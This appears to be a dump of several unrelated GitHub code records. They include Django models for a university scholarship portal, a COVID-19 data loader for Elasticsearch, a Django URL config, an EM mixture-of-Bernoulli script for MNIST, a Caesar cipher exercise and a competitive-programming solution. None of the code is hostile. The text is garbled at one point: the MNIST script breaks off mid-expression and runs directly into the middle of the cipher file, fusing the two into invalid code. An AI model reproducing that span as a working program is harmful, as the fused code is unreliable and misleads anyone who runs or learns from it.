\"Sikkim\"),\n (\"Tamil Nadu\", \"Tamil Nadu\"),\n (\"Telangana\", \"Telangana\"),\n (\"Tripura\", \"Tripura\"),\n (\"Uttarakhand\", \"Uttarakhand\"),\n (\"Uttar Pradesh\", \"Uttar Pradesh\"),\n (\"West Bengal\", \"West Bengal\"),\n (\"Andaman and Nicobar Islands\", \"Andaman and Nicobar Islands\"),\n (\"Chandigarh\", \"Chandigarh\"),\n (\n \"Dadra and Nagar Haveli and Daman & Diu\",\n \"Dadra and Nagar Haveli and Daman & Diu\",\n ),\n (\"The Government of NCT of Delhi\", \"The Government of NCT of Delhi\"),\n (\"Jammu & Kashmir\", \"Jammu & Kashmir\"),\n (\"Ladakh\", \"Ladakh\"),\n (\"Lakshadweep\", \"Lakshadweep\"),\n (\"Puducherry\", \"Puducherry\"),\n)\n\n\nclass Constraint(models.Model):\n name = models.CharField(max_length=1024)\n description = models.TextField(blank=True, null=True)\n required = models.BooleanField(default=True)\n\n def __str__(self):\n return self.name\n\n\nclass ScholarshipCategory(models.Model):\n name = models.CharField(max_length=1024)\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name_plural = \"Scholarship Categories\"\n\n\nclass Scholarship(models.Model):\n class ScholarshipType(models.IntegerChoices):\n # NOTE: don't change the integer values\n MCM_TIET = 1\n MCM_ALUMNI = 2\n MCM_OTHER = 3\n MERIT_ALUMNI = 4\n MERIT_AUTO = 5\n\n name = models.CharField(max_length=200)\n category = models.ForeignKey(ScholarshipCategory, on_delete=models.CASCADE)\n scholarship_type = models.IntegerField(choices=ScholarshipType.choices)\n\n eligibility_criteria = models.TextField()\n number_of_scholarships = models.CharField(max_length=1024)\n value_of_scholarship = models.TextField()\n\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n constraints = models.ManyToManyField(Constraint, through=\"ScholarshipConstraint\")\n\n def __str__(self):\n return self.name\n\n @property\n def verbose_type(self):\n if self.scholarship_type == 1:\n return \"MCM_TIET\"\n elif self.scholarship_type == 2:\n return \"MCM_ALUMNI\"\n elif self.scholarship_type == 3:\n return \"MCM_OTHER\"\n elif self.scholarship_type == 4:\n return \"MERIT_ALUMNI\"\n else:\n return \"MERIT_AUTO\"\n\n\nclass ScholarshipConstraint(models.Model):\n scholarship = models.ForeignKey(Scholarship, on_delete=models.CASCADE)\n constraint = models.ForeignKey(Constraint, on_delete=models.CASCADE)\n min_value = 
models.FloatField(blank=True, null=True)\n max_value = models.FloatField(blank=True, null=True)\n\n def __str__(self):\n return f\"{self.constraint.name} constraint on [{self.scholarship.name}]\"\n\n\nclass MCMTietApplication(models.Model):\n \"\"\"Scholarship Type: MCM_TIET = 1\"\"\"\n\n student = models.ForeignKey(Student, on_delete=models.CASCADE)\n scholarship = models.ForeignKey(Scholarship, on_delete=models.CASCADE)\n contact_number = models.PositiveIntegerField()\n alternate_contact_number = models.PositiveIntegerField()\n state_of_residence = models.CharField(choices=STATE_CHOICES, max_length=255)\n\n class_12_marks = models.CharField(\n max_length=255, help_text=\"Enter percentage e.g. 89.8 \"\n ) # % or CGPA\n current_cgpa_or_rank = models.CharField(\n max_length=255, help_text=\"Current CGPA or Rank or Diploma %\"\n )\n\n family_income_per_mcm_application = models.CharField(\n max_length=255, help_text=\"FAMILY INCOME AS MENTIONED IN MCM APPLICATION FORM\"\n )\n family_income_per_affidavit = models.CharField(\n max_length=255, help_text=\"FAMILY INCOME AS PER AFFIDAVIT ATTACHED\"\n )\n family_income_per_certificate = models.CharField(\n max_length=255, help_text=\"FAMILY INCOME AS PER CERTIFICATE OF TEHSILDAR\"\n )\n bank_balance = models.IntegerField()\n fdr_balance = models.CharField(max_length=255, help_text=\"\")\n\n itr_annual_year_current = models.IntegerField(help_text=\"ITR for this annual year\")\n itr_annual_year_last = models.IntegerField(help_text=\"ITR for previous annual year\")\n itr_annual_year_last_last = models.IntegerField(\n help_text=\"ITR for last to last annual year\"\n )\n\n immovable_property = models.BooleanField(\n help_text=\"IMMOVABLE PROPERTY AS PER AFFIDAVIT\"\n )\n single_girl_child = models.BooleanField(help_text=\"Are you a Single Girl Child?\")\n\n applied_for_mcp_special = models.BooleanField(help_text=\"APPLIED FOR MCM SPECIAL?\")\n mcp_special_reason = models.TextField(\n help_text=\"SPECIFIC REASON FOR APPLYING MCM SPECIAL?\", blank=True, null=True\n )\n\n applied_for_other_scholarship = models.BooleanField(\n help_text=\"HAVE YOU APPLIED FOR ANY OTHER SCHOLARSHIP?\"\n )\n other_scholarship_details = models.TextField(\n help_text=\"DETAILS OF OTHER SCHOLARSHIP APPLIED\", blank=True, null=True\n )\n\n previous_year_scholarship = models.BooleanField(\n help_text=\"HAVE YOU RECEIVED ANY SCHOLARSHIP IN THE PREVIOUS YEAR?\"\n )\n previous_year_scholarship_details = models.TextField(\n help_text=\"DETAILS OF PREVIOUS SCHOLARSHIP RECEIVED\", blank=True, null=True\n )\n previous_year_scholarship_amount = models.IntegerField(\n help_text=\"AMOUNT OF THE PREVIOUS SCHOLARSHIP\", blank=True, null=True\n )\n\n income_certificate = models.FileField(\n help_text=\"Please upload a digital / scanned copy of your income certificate\",\n upload_to=\"income_certificates\",\n validators=[\n FileExtensionValidator(allowed_extensions=[\"pdf\", \"jpg\", \"png\", \"jpeg\"])\n ],\n )\n supporting_documents = models.FileField(\n help_text=\"Please upload supporting documents in a .zip format, if any\",\n blank=True,\n null=True,\n upload_to=\"supporting_documents\",\n )\n\n declaration = models.BooleanField(\n help_text=\"I acknowledge that i have read all the eligibility criteria of scholarship and i am eligible for \"\n \"applying to TIET Merit-cum-means scholarship.\"\n )\n\n status = models.CharField(\n max_length=1024,\n default=\"PENDING\",\n choices=(\n (\"PENDING\", \"PENDING\"),\n (\"APPROVED\", \"APPROVED\"),\n (\"REJECTED\", \"REJECTED\"),\n ),\n )\n 
remarks = models.TextField(blank=True, null=True)\n\n # TODO: fill more fields, https://docs.google.com/forms/d/e/1FAIpQLScSaU3NGIu13V4j9fEi5B1Djl503c72o9sZ-9YsVY1_hsM4aA/viewform\n\n def __str__(self):\n return f\"Application for [{self.scholarship.name[:15]}...]\"\n\n class Meta:\n verbose_name_plural = \"Merit cum Means Applications\"\n verbose_name = \"Merit cum means Application\"\n\n\nclass MCMAlumniApplication(models.Model):\n \"\"\"Scholarship Type: MCM_ALUMNI = 2\"\"\"\n\n student = models.ForeignKey(Student, on_delete=models.CASCADE)\n scholarship = models.ForeignKey(Scholarship, on_delete=models.CASCADE)\n\n photograph = models.FileField(\n help_text=\"Passport size photograph in JPG/PNG under 2 MB.\",\n blank=True,\n null=True,\n upload_to=\"photographs\",\n )\n\n roll_no = models.CharField(max_length=20, help_text=\"Registration/Roll No\")\n personal_contact_number = models.PositiveIntegerField()\n year = models.CharField(max_length=20, help_text=\"Year\")\n branch = models.CharField(max_length=20, help_text=\"Branch\")\n\n jee_main_rank = models.CharField(max_length=255, help_text=\"JEE Main Rank\")\n current_cgpa = models.CharField(max_length=255, help_text=\"Current CGPA\")\n\n father_name = models.CharField(max_length=255, help_text=\"Father's Name\")\n father_profession = models.CharField(\n max_length=255, help_text=\"Father's Profession\"\n )\n father_contact_number = models.PositiveIntegerField(\n help_text=\"Father's Contact Number\"\n )\n\n mother_name = models.CharField(max_length=255, help_text=\"Mother's Name\")\n mother_profession = models.CharField(\n max_length=255, help_text=\"Mother's Profession\"\n )\n\n mother_contact_number = models.PositiveIntegerField(\n help_text=\"Mother's Contact Number\"\n )\n\n family_income_per_annum = models.CharField(\n max_length=255, help_text=\"Family income per annum\"\n )\n\n bank_name = models.CharField(max_length=255, help_text=\"Student's Bank Name\")\n bank_account_number = models.CharField(\n max_length=255, help_text=\"Bank Savings Account Number\"\n )\n banK_address = models.CharField(max_length=255, help_text=\"Bank Branch Address\")\n bank_ifsc_code = models.CharField(max_length=255, help_text=\"Bank IFSC Code\")\n\n declaration = models.BooleanField(\n help_text=\"I acknowledge that I have read all the eligibility criteria of this scholarship and I am eligible \"\n \"for applying to this scholarship.\"\n )\n\n status = models.CharField(\n max_length=1024,\n default=\"PENDING\",\n choices=(\n (\"PENDING\", \"PENDING\"),\n (\"APPROVED\", \"APPROVED\"),\n (\"REJECTED\", \"REJECTED\"),\n ),\n )\n remarks = models.TextField(blank=True, null=True)\n\n def __str__(self):\n return f\"Application for [{self.scholarship.name[:15]}...]\"\n\n class Meta:\n verbose_name_plural = \"Merit cum Means Alumni Applications\"\n verbose_name = \"Merit cum Means Alumni Application\"\n\n\nclass MCMOtherApplication(models.Model):\n \"\"\"Scholarship Type: MCM_OTHER = 3\"\"\"\n\n student = models.ForeignKey(Student, on_delete=models.CASCADE)\n scholarship = models.ForeignKey(Scholarship, on_delete=models.CASCADE)\n\n photograph = models.FileField(\n help_text=\"Passport size photograph in JPG/PNG under 2 MB.\",\n blank=True,\n null=True,\n upload_to=\"photographs\",\n )\n\n roll_no = models.CharField(max_length=20, help_text=\"Registration/Roll No\")\n personal_contact_number = models.PositiveIntegerField()\n year = models.CharField(max_length=20, help_text=\"Year\")\n branch = models.CharField(max_length=20, help_text=\"Branch\")\n\n 
jee_main_rank = models.CharField(max_length=255, help_text=\"JEE Main Rank\")\n current_cgpa = models.CharField(max_length=255, help_text=\"Current CGPA\")\n\n father_name = models.CharField(max_length=255, help_text=\"Father's Name\")\n father_profession = models.CharField(\n max_length=255, help_text=\"Father's Profession\"\n )\n father_contact_number = models.PositiveIntegerField(\n help_text=\"Father's Contact Number\"\n )\n\n mother_name = models.CharField(max_length=255, help_text=\"Mother's Name\")\n mother_profession = models.CharField(\n max_length=255, help_text=\"Mother's Profession\"\n )\n\n mother_contact_number = models.PositiveIntegerField(\n help_text=\"Mother's Contact Number\"\n )\n\n family_income_per_annum = models.CharField(\n max_length=255, help_text=\"Family income per annum\"\n )\n\n bank_name = models.CharField(max_length=255, help_text=\"Student's Bank Name\")\n bank_account_number = models.CharField(\n max_length=255, help_text=\"Bank Savings Account Number\"\n )\n banK_address = models.CharField(max_length=255, help_text=\"Bank Branch Address\")\n bank_ifsc_code = models.CharField(max_length=255, help_text=\"Bank IFSC Code\")\n\n declaration = models.BooleanField(\n help_text=\"I acknowledge that I have read all the eligibility criteria of this scholarship and I am eligible \"\n \"for applying to this scholarship.\"\n )\n\n status = models.CharField(\n max_length=1024,\n default=\"PENDING\",\n choices=(\n (\"PENDING\", \"PENDING\"),\n (\"APPROVED\", \"APPROVED\"),\n (\"REJECTED\", \"REJECTED\"),\n ),\n )\n remarks = models.TextField(blank=True, null=True)\n\n def __str__(self):\n return f\"Application for [{self.scholarship.name[:15]}...]\"\n\n class Meta:\n verbose_name_plural = \"Merit cum Means Other Applications\"\n verbose_name = \"Merit cum Means Other Application\"\n\n\nclass NoticeCategory(models.Model):\n id = models.UUIDField(default=uuid4, primary_key=True, unique=True, editable=False)\n title = models.TextField()\n collapsed = models.BooleanField(default=True)\n\n def __str__(self):\n return self.title\n\n class Meta:\n verbose_name_plural = \"Notice Categories\"\n\n\nclass Notice(models.Model):\n id = models.UUIDField(default=uuid4, primary_key=True, unique=True, editable=False)\n category = models.ForeignKey(\n NoticeCategory, on_delete=models.CASCADE, blank=True, null=True\n )\n title = models.TextField()\n attachment = models.FileField(blank=True, null=True, upload_to=\"notice_attachments\")\n link = models.CharField(max_length=1024, blank=True, null=True)\n date = models.DateTimeField(auto_now_add=True, editable=False)\n\n def __str__(self):\n return self.title\n\n\nclass Grievance(models.Model):\n student = models.ForeignKey(Student, on_delete=models.CASCADE)\n subject = models.TextField()\n issue_details = models.TextField()\n date_opened = models.DateTimeField(auto_now_add=True)\n\n resolved = models.BooleanField(default=False)\n remarks = models.TextField(blank=True, null=True)\n\n def __str__(self):\n return self.subject\n\n\nclass ReceivedScholarship(models.Model):\n student = models.ForeignKey(Student, on_delete=models.CASCADE)\n scholarship = models.ForeignKey(Scholarship, on_delete=models.CASCADE)\n session = models.ForeignKey(Session, on_delete=models.CASCADE)\n\n year_of_study = models.CharField(max_length=1024, blank=True, null=True)\n branch = models.CharField(max_length=1024, default=\"UNSPECIFIED\")\n programme = models.CharField(blank=True, null=True, max_length=1024)\n\n current_cgpa = models.FloatField(blank=True, null=True)\n 
cgpa_1st_semester = models.FloatField(blank=True, null=True)\n cgpa_2nd_semester = models.FloatField(blank=True, null=True)\n cgpa_3rd_semester = models.FloatField(blank=True, null=True)\n sgpa_5th_semester = models.FloatField(blank=True, null=True)\n sgpa_6th_semester = models.FloatField(blank=True, null=True)\n agpa = models.FloatField(blank=True, null=True)\n marks = models.FloatField(blank=True, null=True)\n jee_rank = models.FloatField(blank=True, null=True)\n pcme_percentage = models.FloatField(blank=True, null=True)\n pcb_percentage = models.FloatField(blank=True, null=True)\n ti_rank = models.FloatField(blank=True, null=True)\n tu_rank = models.FloatField(blank=True, null=True)\n twelfth_overall_percentage = models.FloatField(blank=True, null=True)\n\n amount = models.PositiveIntegerField()\n\n def __str__(self):\n return self.scholarship.name + f\" [{self.session.name}]\"\n\n\nclass CertificateRequest(models.Model):\n received_scholarship = models.OneToOneField(ReceivedScholarship, on_delete=models.CASCADE)\n student = models.ForeignKey(Student, on_delete=models.CASCADE)\n date_requested = models.DateTimeField(auto_now=True, editable=False)\n approved = models.BooleanField(default=False)\n date_approved = models.DateTimeField(blank=False, null=True)\n year_of_passing = models.CharField(max_length=1024, blank=False, null=True)\n passing_cgpa = models.CharField(max_length=1024, blank=False, null=True)\n certificate = models.FileField(blank=True, null=True)\n\n def __str__(self):\n return self.received_scholarship.scholarship.name + \": \" + self.received_scholarship.session.name\n\n def save(self, *args, **kwargs):\n if self.approved:\n rendered_certificate = render_to_string(\"pdfs/scholarship_certificate.html\", {\n 'date': self.date_approved.date(),\n 'image_path': finders.find('signature.png'),\n 'ref_no': self.id,\n 'name': self.student.student_name or self.student.user.get_full_name(),\n 'roll_no': self.student.roll_no,\n 'father_name': self.student.father_name,\n 'programme_name': self.student.program_name,\n 'branch': self.student.branch_desc,\n 'passing': self.year_of_passing,\n 'cgpa': self.passing_cgpa,\n 'scholarship': self.received_scholarship.scholarship.name,\n 'amount': self.received_scholarship.amount,\n 'session': self.received_scholarship.session.name\n })\n\n options = {\n 'page-size': 'Letter',\n 'margin-top': '0.75in',\n 'margin-right': '0.75in',\n 'margin-bottom': '0.75in',\n 'margin-left': '0.75in',\n 'encoding': \"UTF-8\",\n 'custom-header': [\n ('Accept-Encoding', 'gzip')\n ],\n 'no-outline': None\n }\n certificate_name = f\"scholarship_certificate_{uuid4()}.pdf\"\n pdfkit.from_string(rendered_certificate,\n settings.MEDIA_ROOT / certificate_name,\n options=options)\n self.certificate.name = certificate_name\n\n super(CertificateRequest, self).save(*args, **kwargs)\n\n\nclass ExcelError:\n\n def __init__(self, row_id, error_msg):\n self.row_id = row_id\n self.error_msg = error_msg\n","repo_name":"MagnumDingusEdu/capstone","sub_path":"website/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":18324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"71844702829","text":"from datetime import datetime\nimport csv\nimport requests\nfrom elasticsearch import Elasticsearch\n\n\ndef formatCCAA(ccaa):\n if ccaa == \"C. Valenciana\":\n ccaa = \"Comunidad Valenciana\"\n elif ccaa == \"Madrid\":\n ccaa = \"Comunidad de Madrid\"\n elif ccaa == \"Murcia\":\n ccaa = \"Región de Murcia\"\n elif ccaa == \"Baleares\":\n ccaa = \"Islas Baleares\"\n\n return ccaa\n\n\n# Spain urls\nurl_altas_spain = \"https://raw.githubusercontent.com/datadista/datasets/master/COVID%2019/ccaa_covid19_altas.csv\"\nurl_casos_spain = \"https://raw.githubusercontent.com/datadista/datasets/master/COVID%2019/ccaa_covid19_casos.csv\"\nurl_fallecidos_spain = \"https://raw.githubusercontent.com/datadista/datasets/master/COVID%2019/ccaa_covid19_fallecidos.csv\"\nurl_uci_spain = \"https://raw.githubusercontent.com/datadista/datasets/master/COVID%2019/ccaa_covid19_uci.csv\"\n\n\n# CCAA\nurl_ccaa_cyl = \"https://datosabiertos.jcyl.es/web/jcyl/risp/es/sector-publico/situacion-epidemiologica-coronavirus/1284940407131.csv\"\n\n\ndef save_elasticsearch_es(index, result_data):\n\n es = Elasticsearch()\n\n es.indices.create(\n index=index,\n ignore=400 # ignore 400 already exists code\n )\n print(result_data)\n\n id_case = str(result_data['date'].timestamp()) + \\\n '-'+result_data['CCAA']+'-'+result_data['type']\n es.index(index=index, id=id_case, body=result_data)\n\n\ndef get_data_csv_spain(base_url, index, case_type):\n '''\n :param base_url:\n :param index:\n :param type:\n\n '''\n\n with requests.get(base_url, stream=True) as r:\n lines = (line.decode('utf-8') for line in r.iter_lines())\n datasheets = list(csv.reader(lines))\n\n # Removing last lien with the Total\n del datasheets[-1]\n\n dateframe = datasheets[0][2:]\n for row in datasheets[1:]:\n ccaa = formatCCAA(row[1])\n\n result_data = {\n 'CCAA': ccaa,\n 'country': 'Spain',\n }\n\n previousData = 0\n infection_day_100 = 0\n\n for day, data in zip(dateframe, row[2:]):\n dataAux = int(data)\n data = int(data) - previousData\n previousData = dataAux\n\n if dataAux >= 100:\n infection_day_100 += 1\n\n result_data.update(\n date=datetime.strptime(day, \"%Y-%m-%d\"),\n type=case_type,\n count_case=int(data),\n total_case=dataAux,\n rate_100_infection=infection_day_100\n )\n save_elasticsearch_es(index, result_data)\n\n\nif __name__ == '__main__':\n\n # COVID Spain\n index_name = 'covid_spain'\n get_data_csv_spain(url_altas_spain, index_name, 'recuperado')\n get_data_csv_spain(url_casos_spain, index_name, 'confirmado')\n get_data_csv_spain(url_fallecidos_spain, index_name, 'fallecido')\n get_data_csv_spain(url_uci_spain, index_name, 'uci')\n","repo_name":"david-morenomoreno/COVID19","sub_path":"covidSpain.py","file_name":"covidSpain.py","file_ext":"py","file_size_in_byte":2988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"1103000429","text":"\"\"\"app URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom drf_spectacular.views import (\n SpectacularAPIView,\n SpectacularSwaggerView,\n)\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom rest_framework_simplejwt.views import (\n TokenObtainPairView,\n TokenRefreshView,\n TokenVerifyView,\n)\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('api/schema/', SpectacularAPIView.as_view(), name='api-schema'),\n path('api/docs/',\n SpectacularSwaggerView.as_view(url_name='api-schema'),\n name='api-docs'),\n path('api/user/', include('user.urls')),\n path('api/forest/', include('forest.urls')),\n path('api/species/', include('species.urls')),\n path('api/reference/', include('reference.urls')),\n path('api/register/', include('register.urls')),\n path('api/register_picture/', include('register_picture.urls')),\n path('api/login/',\n TokenObtainPairView.as_view(),\n name='token_obtain_pair'),\n path('api/login/refresh/',\n TokenRefreshView.as_view(),\n name='token_refresh'),\n path('api/login/verify/',\n TokenVerifyView.as_view(),\n name='token_verify'),\n]\n","repo_name":"taniagmangolini/suceco-api","sub_path":"app/app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"34030774035","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\nfrom sklearn.datasets import fetch_openml\n\nmnist = fetch_openml(\"mnist_784\")\nmnist.data.shape\n'''\nMNIST data is in grey scale [0, 255].\nConvert it to a binary scale using a threshold of 128.\n'''\nmnist3 = (mnist.data/128).astype('int')\ndef pixel_convert(x):\n count = 0\n while x > 8 :\n count+=1\n x=x-8\n return count\n\ndef load_image_data(image_file):\n image = []\n image_for_discrete = []\n magic_number = image_file.read(4)\n magic_number = int.from_bytes(magic_number, byteorder='big') # byteorder='big':輸入左邊bit為高位,右邊為低位\n images_number = image_file.read(4)\n images_number = int.from_bytes(images_number, byteorder='big') # byteorder='big':輸入左邊bit為高位,右邊為低位\n rows_number = image_file.read(4)\n rows_number = int.from_bytes(rows_number, byteorder='big') # byteorder='big':輸入左邊bit為高位,右邊為低位\n columns_number = image_file.read(4)\n columns_number = int.from_bytes(columns_number, byteorder='big') # byteorder='big':輸入左邊bit為高位,右邊為低位\n for i in range(images_number):\n temp_image = []\n temp_image_for_discrete = []\n for j in range(rows_number*columns_number):\n data = image_file.read(1)\n data = int.from_bytes(data, byteorder='big')\n data_for_discrete = convert_pixel(data)\n temp_image.append(data)\n temp_image_for_discrete.append(data_for_discrete)\n image.append(temp_image)\n image_for_discrete.append(temp_image_for_discrete)\n #print(image) \n return image ,image_for_discrete\n\ndef load_label_data(label_file):\n label = []\n magic_number = label_file.read(4)\n magic_number = int.from_bytes(magic_number, byteorder='big') # byteorder='big':輸入左邊bit為高位,右邊為低位\n items_number = label_file.read(4)\n items_number = int.from_bytes(items_number, byteorder='big') # byteorder='big':輸入左邊bit為高位,右邊為低位\n \n for i in range(items_number):\n data = label_file.read(1)\n data = int.from_bytes(data, byteorder='big')\n label.append(data)\n return label \n\n\ndef print_test_image(image_list,label_list):\n data=open(\"output_image.txt\",'w+')\n data.write(\"Imagination of numbers in Bayesian classifier:\\n\")\n for i in range(len(image_list)):\n data.write(str(label_list[i])+\":\\n\")\n for j in range(28):\n for k in range(28):\n if image_list[i][k+28*j]<8:\n data.write(\"0\")\n else:\n data.write(\"1\") \n data.write(\"\\n\")\n data.write(\"\\n\")\n data.write(\"\\n\")\n return 0\n\ndef convert_pixel(x):\n if x > 127:\n return 1\n else:\n return 0\ndef show(image):\n '''\n Function to plot the MNIST data\n '''\n fig = plt.figure()\n ax = fig.add_subplot(1,1,1)\n imgplot = ax.imshow(image, cmap=plt.cm.Greys)\n imgplot.set_interpolation('nearest')\n ax.xaxis.set_ticks_position('top')\n ax.yaxis.set_ticks_position('left')\n plt.show()\n\ndef bernoulli(data, means):\n '''To compute the probability of x for each bernouli distribution\n data = N X D matrix\n means = K X D matrix\n prob (result) = N X K matrix \n '''\n N = len(data)\n K = len(means)\n #compute prob(x/mean)\n # prob[i, k] for ith data point, and kth cluster/mixture distribution\n prob = np.zeros((N, K))\n \n for i in range(N):\n for k in range(K):\n prob[i,k] = np.prod((means[k]**data[i])*((1-means[k])**(1-data[i])))\n \n return prob\n\ndef respBernoulli(data, weights, means):\n '''To compute responsibilities, or posterior probability p(z/x)\n data = N X D matrix\n weights = K dimensional vector\n means = K X D matrix\n prob or resp (result) = N X K matrix \n '''\n #step 1\n # calculate the p(x/means)\n prob = bernoulli(data, means)\n \n #step 2\n # calculate the 
numerator of the resp.s\n prob = prob*weights\n \n #step 3\n # calcualte the denominator of the resp.s\n row_sums = prob.sum(axis=1)[:, np.newaxis]\n \n # step 4\n # calculate the resp.s\n try:\n prob = prob/row_sums\n return prob\n except ZeroDivisionError:\n print(\"Division by zero occured in reponsibility calculations!\")\n \n \n\ndef bernoulliMStep(data, resp):\n '''Re-estimate the parameters using the current responsibilities\n data = N X D matrix\n resp = N X K matrix\n return revised weights (K vector) and means (K X D matrix)\n '''\n N = len(data)\n D = len(data[0])\n K = len(resp[0])\n \n Nk = np.sum(resp, axis=0)\n mus = np.empty((K,D))\n \n for k in range(K):\n mus[k] = np.sum(resp[:,k][:,np.newaxis]*data,axis=0) #sum is over N data points\n try:\n mus[k] = mus[k]/Nk[k] \n except ZeroDivisionError:\n print(\"Division by zero occured in Mixture of Bernoulli Dist M-Step!\")\n break \n \n return (Nk/N, mus)\n\ndef llBernoulli(data, weights, means):\n '''To compute expectation of the loglikelihood of Mixture of Beroullie distributions\n Since computing E(LL) requires computing responsibilities, this function does a double-duty\n to return responsibilities too\n '''\n N = len(data)\n K = len(means)\n \n resp = respBernoulli(data, weights, means)\n \n ll = 0\n for i in range(N):\n sumK = 0\n for k in range(K):\n try:\n temp1 = ((means[k]**data[i])*((1-means[k])**(1-data[i])))\n temp1 = np.log(temp1.clip(min=1e-50))\n \n except:\n print(\"Problem computing log(probability)\")\n sumK += resp[i, k]*(np.log(weights[k])+np.sum(temp1))\n ll += sumK\n \n return (ll, resp)\n\ndef mixOfBernoulliEM(data, init_weights, init_means, maxiters=1000, relgap=1e-4, verbose=False):\n '''EM algo fo Mixture of Bernoulli Distributions'''\n N = len(data)\n D = len(data[0])\n K = len(init_means)\n \n #initalize\n weights = init_weights[:]\n means = init_means[:]\n ll, resp = llBernoulli(data, weights, means)\n ll_old = ll\n \n for i in range(maxiters):\n if verbose and (i % 5 ==0):\n print(\"iteration {}:\".format(i))\n print(\" {}:\".format(weights))\n print(\" {:.6}\".format(ll))\n \n #E Step: calculate resps\n #Skip, rolled into log likelihood calc\n #For 0th step, done as part of initialization\n \n #M Step\n weights, means = bernoulliMStep(data, resp)\n \n #convergence check\n ll, resp = llBernoulli(data, weights, means)\n if np.abs(ll-ll_old) ord(\"z\"):\n encrypted += chr(ord(letter) + step - len(string.ascii_lowercase)).upper()\n else:\n encrypted += chr(ord(letter) + step).upper()\n encrypted_words.append(encrypted)\n \n return \" \".join(encrypted_words)\n\n\n# decrypt a message using a Caesars cipher \ndef caesars_decrypt(to_decrypt = str, \n step = int):\n \n \"\"\"\n Decrypts a message that was originally encrypted using Caesars cipher\n The steps can again be inputted in the function\n \"\"\"\n \n word_list = list(to_decrypt.split(\" \"))\n decrypted_words = []\n \n for word in word_list:\n decrypted = \"\"\n for letter in word:\n if letter not in string.ascii_uppercase:\n continue\n letter = letter.lower()\n if (ord(letter) - step) < ord(\"a\"):\n decrypted += chr(ord(letter) - step + len(string.ascii_lowercase))\n else:\n decrypted += chr(ord(letter) - step)\n decrypted_words.append(decrypted)\n \n return \" \".join(decrypted_words)\n \n\ndef break_caesar(message = str, \n most_frequent = \"e\"):\n \n \"\"\"\n Attempts to decode an encode message based on frequency analysis\n This function relies on the hypothesis that the letter 'e' is the most\n commonly used letter in strings\n \"\"\"\n 
\n highest_proportion = -1\n frequent_letter = \"\"\n \n # get the most frequent letter\n for letter in set(message):\n if message.count(letter) > highest_proportion:\n highest_proportion = message.count(letter)\n frequent_letter = letter\n \n # assume that this letter represents an \"e\"\n step = ord(frequent_letter.lower()) - ord(\"e\")\n \n return caesars_decrypt(to_decrypt = message, \n step = step)\n \n\n#%%\n \n# the string we start from\ntext = \"lorem ipsum dolor sit amet consectetur adipiscing elit sed do eiusmod tempor incididunt ut labore et dolore magna aliqua semper viverra nam libero justo laoreet sit amet cursus nibh ipsum consequat nisl vel pretium lectus condimentum id venenatis a condimentum vitae sapien elit eget gravida cum sociis natoque penatibus et in hendrerit gravida rutrum quisque pulvinar etiam non quam lacus aliquam faucibus purus in massa tempor nec feugiat nisl pretium blandit volutpat maecenas volutpat blandit aliquam etiam erat velit scelerisque in dictum non consectetur a sagittis orci a scelerisque purus semper at urna condimentum mattis pellentesque id nibh vitae purus faucibus ornare suspendisse libero justo laoreet sit amet cursus sit\"\n\nprint(\"\\n- - - -\\nOriginal message\\n- - - -\\n\")\nprint(text)\n\n# an example of the encryption process\nencrypted = caesars_encrypt(to_encrypt = text,\n step = 3)\nprint(\"\\n- - - -\\nEncrypted message using Caesar's cipher\\n- - - -\\n\")\nprint(encrypted)\n\n# an example of the decryption process\ndecrypted = caesars_decrypt(to_decrypt = encrypted, \n step = 3)\nprint(\"\\n- - - -\\nDecrypted message using Caesar's cipher\\n- - - -\\n\")\nprint(decrypted)\n\n# show the code breaker\ndeciphered = break_caesar(message = encrypted.replace(\" \", \"\"))\nprint(\"\\n- - - -\\nDecrypted message using frequency analysis\\n- - - -\\n\")\nprint(deciphered)","repo_name":"shaista1519/Practice-of-computing-using-Python","sub_path":"Part 3/Chapter 07/Programming projects/project_04.py","file_name":"project_04.py","file_ext":"py","file_size_in_byte":4419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"207130899","text":"# https://www.acmicpc.net/problem/5430\n\nfrom collections import deque\nimport sys\n\ninput = sys.stdin.readline\n\nt = int(input())\n\nfor _ in range(t):\n p = input().strip()\n n = int(input())\n arr = input().strip()\n if len(arr) == 2: # 빈 배열이 들어왔을 때\n arr = []\n else:\n arr = arr[1:-1].split(',')\n deq = deque(arr)\n \n rvs = False\n err = False\n \n for cmd in p:\n if cmd == 'R': # 배열의 순서 뒤집기\n rvs = False if rvs else True\n elif cmd == 'D': # 첫 번째 수 버리기\n if not deq:\n err = True\n break\n if rvs:\n deq.pop()\n else:\n deq.popleft()\n \n if err:\n print(\"error\")\n continue\n if rvs:\n deq.reverse()\n print(\"[\" + \",\".join(deq) + \"]\")","repo_name":"zero0205/Algorithm_Python","sub_path":"solved_class3/5430_AC.py","file_name":"5430_AC.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
